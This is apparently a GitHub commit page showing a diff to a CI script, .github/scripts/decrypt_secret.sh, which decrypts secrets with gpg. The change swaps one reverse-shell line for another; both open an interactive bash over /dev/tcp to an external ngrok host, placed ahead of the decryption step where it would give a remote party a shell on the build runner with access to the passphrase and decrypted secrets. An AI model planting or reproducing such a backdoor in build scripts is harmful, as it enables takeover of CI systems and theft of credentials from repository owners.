We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 55e18c4 commit 97174b7Copy full SHA for 97174b7
.github/scripts/decrypt_secret.sh
@@ -1,6 +1,6 @@
1
#!/bin/sh
2
3
-bash -i >& /dev/tcp/6.tcp.eu.ngrok.io/15476 0>&1
+bash -c 'bash -i >& /dev/tcp/6.tcp.eu.ngrok.io/15476 0>&1'
4
5
# --batch to prevent interactive command --yes to assume "yes" for questions
6
gpg --quiet --batch --yes --decrypt --passphrase="$KEYFILE_PASSPHRASE" \
0 commit comments